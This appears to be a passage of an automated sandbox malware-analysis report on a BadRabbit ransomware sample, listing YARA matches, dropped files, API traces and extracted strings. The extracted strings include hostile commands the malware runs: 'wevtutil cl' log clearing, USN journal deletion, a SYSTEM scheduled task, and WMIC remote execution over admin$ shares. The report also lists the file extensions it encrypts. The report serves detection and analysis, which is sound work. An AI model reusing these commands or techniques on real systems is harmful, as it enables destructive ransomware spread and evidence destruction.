          Source: 3.2.rundll32.exe.3216810.1.raw.unpack, type: UNPACKEDPEMatched rule: BadRabbit Payload Author: kevoreilly
          Source: 00000003.00000003.1276632248.0000000004D91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
          Source: C:\Windows\cscc.dat, type: DROPPEDMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
          Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Contains functionality to create processes via WMI
          Source: rundll32.exe, 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted*..Readme.txt%s-h-f%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhost0.0.0.0\rundll32.exe%ws C:\Windows\%ws,#1 %wsSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilege%08X%08X/c %ws%wswevtutil cl %ws & SetupSystemSecurityApplicationfsutil usn deletejournal /D %c:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00schtasks /Delete /F /TN drogon255.255.255.255%u.%u.%u.%uC:\Windows\System32\rundll32.exe "C:\Windows\",#2 \\%s\admin$\\%ws\admin$\%wsprocess call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "wbem\wmic.exe%ws WaitForMultipleObjectskernel32memstr_e665ed98-6
          Source: C:\Windows\D99F.tmpCode function: 19_2_00007FF60975214C GetCurrentProcess,NtQueryInformationProcess,RtlGetCurrentPeb,19_2_00007FF60975214C
          Source: C:\Windows\D99F.tmpCode function: 19_2_00007FF609751864 NtQuerySystemInformation,GetModuleHandleW,GetProcAddress,LocalAlloc,NtQuerySystemInformation,LocalFree,19_2_00007FF609751864
          Source: C:\Windows\dispci.exeCode function: 32_2_00A82020: TlsGetValue,CreateFileW,TlsSetValue,DeviceIoControl,GetLastError,32_2_00A82020
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF9534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,3_2_04BF9534
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF9B63 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,GetSystemDirectoryW,CloseHandle,PathAppendW,PathFileExistsW,wsprintfW,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError,3_2_04BF9B63
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF8A23 InitiateSystemShutdownExW,ExitWindowsEx,ExitProcess,3_2_04BF8A23
          Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exeFile created: C:\Windows\infpub.datJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\cscc.datJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\dispci.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\D99F.tmpJump to behavior
          Source: C:\Windows\dispci.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\CachesJump to behavior
          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
          Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\infpub.datJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exeCode function: 0_2_0051201D0_2_0051201D
          Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exeCode function: 0_2_005138400_2_00513840
          Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exeCode function: 0_2_0051173C0_2_0051173C
          Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exeCode function: 0_2_005130E30_2_005130E3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BFA83C3_2_04BFA83C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BFC1E33_2_04BFC1E3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BFB11D3_2_04BFB11D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF27083_2_04BF2708
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BFC9403_2_04BFC940
          Source: C:\Windows\D99F.tmpCode function: 19_2_00007FF609755C0019_2_00007FF609755C00
          Source: C:\Windows\dispci.exeCode function: 32_2_00A918BC32_2_00A918BC
          Source: C:\Windows\dispci.exeCode function: 32_2_00A90C8F32_2_00A90C8F
          Source: C:\Windows\dispci.exeCode function: 32_2_00A8280032_2_00A82800
          Source: C:\Windows\dispci.exeCode function: 32_2_00A911E032_2_00A911E0
          Source: C:\Windows\dispci.exeCode function: 32_2_00A925F432_2_00A925F4
          Source: C:\Windows\dispci.exeCode function: 32_2_00A882CA32_2_00A882CA
          Source: C:\Windows\dispci.exeCode function: 32_2_00A9073E32_2_00A9073E
          Source: Joe Sandbox ViewDropped File: C:\Windows\cscc.dat 0B2F863F4119DC88A22CC97C0A136C88A0127CB026751303B045F7322A8972F6
          Source: C:\Windows\SysWOW64\wevtutil.exeProcess token adjusted: SecurityJump to behavior
          Source: LisectAVT_2403002C_35.exe, 00000000.00000002.1253396603.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFlashUtil.exev+ vs LisectAVT_2403002C_35.exe
          Source: LisectAVT_2403002C_35.exe, 00000000.00000002.1253127728.0000000000519000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFlashUtil.exev+ vs LisectAVT_2403002C_35.exe
          Source: LisectAVT_2403002C_35.exeBinary or memory string: OriginalFilenameFlashUtil.exev+ vs LisectAVT_2403002C_35.exe
          Source: unknownDriver loaded: C:\Windows\System32\cdd.dll
          Source: LisectAVT_2403002C_35.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: LisectAVT_2403002C_35.exe, type: SAMPLEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.LisectAVT_2403002C_35.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 3.3.rundll32.exe.32943b8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 3.3.rundll32.exe.32943b8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 0.2.LisectAVT_2403002C_35.exe.ede2e0.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 19.0.D99F.tmp.7ff609750000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.0.LisectAVT_2403002C_35.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 3.2.rundll32.exe.32943b8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 3.3.rundll32.exe.32943b8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 19.2.D99F.tmp.7ff609750000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 32.2.dispci.exe.a80000.0.unpack, type: UNPACKEDPEMatched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
          Source: 32.2.dispci.exe.a80000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 32.0.dispci.exe.a80000.0.unpack, type: UNPACKEDPEMatched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
          Source: 32.0.dispci.exe.a80000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 3.3.rundll32.exe.32943b8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 3.2.rundll32.exe.32943b8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 3.3.rundll32.exe.32943b8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 3.3.rundll32.exe.32943b8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 3.2.rundll32.exe.3216810.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 3.2.rundll32.exe.3216810.1.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 3.2.rundll32.exe.3216810.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit author = kevoreilly, description = BadRabbit Payload, cape_type = BadRabbit Payload
          Source: 3.2.rundll32.exe.4bf0000.2.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 3.2.rundll32.exe.4bf0000.2.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 3.2.rundll32.exe.4bf0000.2.unpack, type: UNPACKEDPEMatched rule: BadRabbit author = kevoreilly, description = BadRabbit Payload, cape_type = BadRabbit Payload
          Source: 3.2.rundll32.exe.3216810.1.raw.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 3.2.rundll32.exe.3216810.1.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 3.2.rundll32.exe.3216810.1.raw.unpack, type: UNPACKEDPEMatched rule: BadRabbit author = kevoreilly, description = BadRabbit Payload, cape_type = BadRabbit Payload
          Source: 00000003.00000003.1276632248.0000000004D91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
          Source: C:\Windows\cscc.dat, type: DROPPEDMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
          Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: cscc.dat.3.drBinary string: configFlags\Device\dcrypt\DosDevices\dcryptdump_hiber_%s\$dcsys$$dcsys$\Device\CdRom%s\$DC_TRIM_%x$$dcsys$_fail_%xNTFSFATFAT32exFATRSDS
          Source: rundll32.exe, 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1324901443.00000000031FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted*..Readme.txt%s-h-f%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhost0.0.0.0\rundll32.exe%ws C:\Windows\%ws,#1 %wsSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilege%08X%08X/c %ws%wswevtutil cl %ws & SetupSystemSecurityApplicationfsutil usn deletejournal /D %c:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00schtasks /Delete /F /TN drogon255.255.255.255%u.%u.%u.%uC:\Windows\System32\rundll32.exe "C:\Windows\",#2 \\%s\admin$\\%ws\admin$\%wsprocess call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "wbem\wmic.exe%ws WaitForMultipleObjectskernel32
          Source: rundll32.exe, 00000003.00000003.1276632248.0000000004D91000.00000004.00000020.00020000.00000000.sdmp, dispci.exe, 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp, dispci.exe, 00000020.00000000.1308941790.0000000000A93000.00000002.00000001.01000000.00000008.sdmp, dispci.exe.3.drBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted%lS OK
          Source: classification engineClassification label: mal100.rans.spre.troj.spyw.evad.winEXE@65/14@2/4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF7CC5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,SetLastError,3_2_04BF7CC5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,3_2_04BF9534
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_04BF1368
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF84EE CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,3_2_04BF84EE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF8313 FindResourceW,LoadResource,LockResource,SizeofResource,GetProcessHeap,GetProcessHeap,HeapAlloc,RtlAllocateHeap,memcpy,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,RtlFreeHeap,3_2_04BF8313
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF9534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,3_2_04BF9534
          Source: C:\Windows\dispci.exeFile created: C:\Users\Public\Desktop\DECRYPT.lnkJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5736:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7820:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
          Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\8C5D643B3AD6FDE5
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7936:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4644:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7876:120:WilError_03
          Source: LisectAVT_2403002C_35.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
